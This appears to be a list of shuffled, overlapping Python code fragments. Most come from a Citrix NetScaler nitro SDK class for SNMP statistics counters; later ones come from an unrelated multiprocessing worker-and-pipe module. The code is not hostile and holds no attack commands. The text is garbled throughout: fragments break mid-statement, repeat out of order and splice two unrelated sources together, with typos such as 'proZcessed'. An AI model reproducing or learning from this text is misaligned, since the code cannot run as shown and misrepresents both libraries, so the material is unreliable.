nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats", "try : return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self)", "0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped", "self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property", "Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e @property def", "def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an SNMP", ": \"\"\"SNMP packets that were dropped because they referenced an SNMP engine ID", "known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise", "to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise", "as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\"", "str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as", "self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets", ":param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0)", "str(result.severity)) return result.snmp 
except Exception as e : raise e def _get_object_name(self) :", "e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters", "PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception", "and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e @property", "@property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a", "@property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate", "try : return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self)", "except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs", "snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside of the", "as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full =", "ID that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except", "Messages received that represented an SNMP operation which was not allowed by the", "nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e def", "packets that were dropped because they requested a security level that was unknown", "for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e @property", "raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they", "self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids", "raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered", "have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e:", "e: raise 
e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return", "NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e:", "e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because", ":param name: (Default value = \"\") :param option_: (Default value = \"\") \"\"\"", "raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try :", "as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use", "PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except", "else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e :", "return response except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic", "0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0", "response) : \"\"\"converts nitro response into object and returns the object array in", "be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e @property", "a security level that was unknown to the NetScaler or otherwise unavailable. 
\"\"\"", "def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try", "been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise", "name : response = obj.stat_resources(service, option_) return response except Exception as e: raise", "dropped because they did not contain the expected digest value.\"\"\" try : return", "the value of object identifier argument\"\"\" try : return 0 except Exception as", "Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for", "service: :param name: (Default value = \"\") :param option_: (Default value = \"\")", "e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and", "name: (Default value = \"\") :param option_: (Default value = \"\") \"\"\" try", "e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try", "outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception", "@property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community name", "\"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats", "statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception", "under the License. 
# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from", "e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been", ": raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp", "try : return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self)", "Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for", "def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics", "e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which", "except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs", "except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter", "e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return", "this API to fetch the statistics of all snmp_stats resources that are configured", "the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e @property", "as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped", "2008-2015 Citrix Systems, Inc. 
# # Licensed under the Apache License, Version 2.0", "except Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs", "dropped because they referenced a user that was not known to the SNMP", "0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats()", "return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number", "errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception", "e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by", "= 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate =", "snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an unsupported SNMP", "e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try", "e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this", "as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try :", "an SNMP operation which was not allowed by the SNMP community named in", "(Default value = \"\") \"\"\" try : obj = snmp_stats() if not name", "= [] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid =", "known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e:", ": return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self) :", "self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse", "= 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 
self._snmptoterrreqdropped = 0 self._snmptotparseerrs =", "\"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try : return" ]
[ "'''Blocking request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface", "'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool = False, args=None,", "is not None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc =", "Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if", "self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to", "= multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging),", "to Worker and then wait for it to die.''' if check_alive and not", "interface methods ############### def poll(self) -> bool: '''Check if worker sent anything. '''", "throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def", "# def start(self, num_workers: int, *args, func: Callable = None, **kwargs): # if", "blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any:", "def get_status(self): '''Blocking request status update from worker. 
''' self.send_payload(StatusRequest()) return self.recv() ###############", "self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested", "handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs):", "self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data", "# self.clear() # # def terminate(self): # [w.terminate() for w in self] #", "return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc", "return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any data to", "WorkerProcess class WorkerResource: '''Manages a worker process and pipe to it.''' __slots__ =", "multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process, Value from typing", "0 and all([w.is_alive() for w in self]) # # def start(self, num_workers: int,", "None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx", "data: Any): '''Send data to worker and blocking return result upon reception. '''", "def __init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None, logging:", "# return self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for", "return result upon reception. 
''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive", "Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union", "def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def", "target: Callable = None, start: bool = False, args=None, kwargs=None, logging: bool =", "check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return", "#self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process", "import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess", "worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if", "= None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe,", "Lock, Pipe, Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List,", "has running workers.') # # # start each worker # for ind in", "workers.') # # # start each worker # for ind in range(num_workers): #", "WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload", "# return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process Operations", "if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to", "**kwargs) -> None: '''Send any data to worker process to be handled by", "ctx.Process( 
target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if start:", "Pool, Process, Value from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple,", "= ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if", "isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage()", "then wait for it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()',", "worker process and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self,", "self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation", "any data to worker process to be handled by user function.''' return self.send_payload(DataPayload(data,", "''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try:", "DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif", "(DataPayload or otherwise) to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid)", "or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload,", "False, method: str = 'forkserver'): '''Open Process and pipe to it. ''' self.verbose", "*args, func: Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool", "and blocking return result upon reception. 
''' self.send_data(data) return self.recv_data() def recv_data(self) ->", "= None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has running", "def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise) to", "check_alive=True): '''Send SigClose() to Worker and then wait for it to die.''' if", "except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise", "int, *args, func: Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This", "if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not", "UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process", "exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError,", "function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any data", "bool = True, verbose: bool = False, method: str = 'forkserver'): '''Open Process", ".exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose,", "None else tuple() kwargs = kwargs if kwargs is not None else dict()", "for w in self] # self.clear() # # def terminate(self): # [w.terminate() for", "worker process. 
''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update", "in self] # # ############### Low-Level Process Operations ############### # def join(self): #", "ValueError('This WorkerPool already has running workers.') # # # start each worker #", "try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal", "received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError,", "def join(self, check_alive=True): '''Send SigClose() to Worker and then wait for it to", "def execute(self, data: Any): '''Send data to worker and blocking return result upon", "bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool = False,", "args=None, kwargs=None, logging: bool = True, verbose: bool = False, method: str =", "'forkserver'): '''Open Process and pipe to it. ''' self.verbose = verbose # set", "already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send", "to worker and blocking return result upon reception. 
''' self.send_data(data) return self.recv_data() def", "else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process id", "Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError,", "from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return", "status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError", "all([w.is_alive() for w in self]) # # def start(self, num_workers: int, *args, func:", "self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a", "############### # def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w", "############### def poll(self) -> bool: '''Check if worker sent anything. ''' return self.pipe.poll()", "typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import", "Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has", "is not None: args = args if args is not None else tuple()", "data to worker and blocking return result upon reception. ''' self.send_data(data) return self.recv_data()", "'''Return received DataPayload or raise exception. ''' try: payload = self.pipe.recv() if self.verbose:", "data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True)", "Callable): # return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process", "to it. 
''' self.verbose = verbose # set up userfunc if target is", "target is not None: args = args if args is not None else", "raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ###############", "Operations ############### # def join(self): # [w.join() for w in self] # self.clear()", "update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc to worker process. '''", "try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError):", "process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func:", "self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods", "worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list):", "for w in self] # # ############### Low-Level Process Operations ############### # def", "print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError,", "and all([w.is_alive() for w in self]) # # def start(self, num_workers: int, *args,", "self.verbose = verbose # set up userfunc if target is not None: args", "return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self, exc_type,", "data to worker process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs))", "args is not None else tuple() kwargs = kwargs if kwargs is not", "check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # #", "worker # for ind in 
range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # #", "pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable =", "data from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs) -> None:", "[w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process Operations ############### #", "*arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the", "= args if args is not None else tuple() kwargs = kwargs if", "process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already", "(BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or", "= UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe", "None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc,", "print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) ->", "return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and then wait for", "if args is not None else tuple() kwargs = kwargs if kwargs is", "(UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc,", "return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload", "BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise 
exception.", "# start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func,", "DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource:", "worker and blocking return result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self)", "a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self):", "WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise", "not None else tuple() kwargs = kwargs if kwargs is not None else", "self]) # # def start(self, num_workers: int, *args, func: Callable = None, **kwargs):", "Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload", "self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update from worker. ''' self.send_payload(StatusRequest())", "or otherwise) to worker process. 
''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if", "self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if", "# if self.is_alive(): # raise ValueError('This WorkerPool already has running workers.') # #", "in self] # self.clear() # # def terminate(self): # [w.terminate() for w in", "not None: args = args if args is not None else tuple() kwargs", "return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive and", "UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker", "not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self):", "tuple() kwargs = kwargs if kwargs is not None else dict() userfunc =", "Callable = None, start: bool = False, args=None, kwargs=None, logging: bool = True,", "exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ###############", "__repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self,", "signal to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate()", "is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start", "if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self)", "self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self", "self.proc.is_alive(): raise 
WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except", "raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True):", "if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True):", "import gc import multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process,", "recv_data(self) -> Any: '''Receive raw data from user function.''' return self.recv().data def send_data(self,", "elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise", "# # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self]", "''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) ->", "pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get", "SigClose() to Worker and then wait for it to die.''' if check_alive and", "requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive():", "self] # # ############### Low-Level Process Operations ############### # def join(self): # [w.join()", "def is_alive(self): # return len(self) > 0 and all([w.is_alive() for w in self])", "kwargs if kwargs is not None else dict() userfunc = UserFunc(target, *args, **kwargs)", "and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable", "*args, **kwargs)) def get_status(self): '''Blocking request status update from worker. 
''' self.send_payload(StatusRequest()) return", ".messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import", "self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self,", "raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and", "############### @property def pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self,", "ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle", "[w.join() for w in self] # self.clear() # # def terminate(self): # [w.terminate()", "-> DataPayload: '''Return received DataPayload or raise exception. ''' try: payload = self.pipe.recv()", "-> None: '''Send any data to worker process to be handled by user", "from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions", "return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs)", "**kwargs)) def get_status(self): '''Blocking request status update from worker. 
''' self.send_payload(StatusRequest()) return self.recv()", "raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process id from", "self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was", "self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught", "############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise)", "worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage)", "kwargs = kwargs if kwargs is not None else dict() userfunc = UserFunc(target,", "# # # start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind,", "UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process", "-> None: '''Send a Message (DataPayload or otherwise) to worker process. ''' if", "self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or", "import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException,", "__slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool", "############### Process interface ############### @property def pid(self): '''Get process id from worker.''' return", "-> bool: '''Check if worker sent anything. 
''' return self.pipe.poll() def execute(self, data:", "range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self # # def", "kwargs is not None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc", "join(self, check_alive=True): '''Send SigClose() to Worker and then wait for it to die.'''", "methods ############### def poll(self) -> bool: '''Check if worker sent anything. ''' return", "True, verbose: bool = False, method: str = 'forkserver'): '''Open Process and pipe", "# [w.join() for w in self] # self.clear() # # def terminate(self): #", "payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ###############", "for it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try:", "is not None else tuple() kwargs = kwargs if kwargs is not None", "# return len(self) > 0 and all([w.is_alive() for w in self]) # #", "def start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise", "> 0 and all([w.is_alive() for w in self]) # # def start(self, num_workers:", "############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send a Message", "= ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool =", "one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload,", "process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start()", "return self.recv_data() def recv_data(self) -> Any: '''Receive raw data from user function.''' return", "pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if 
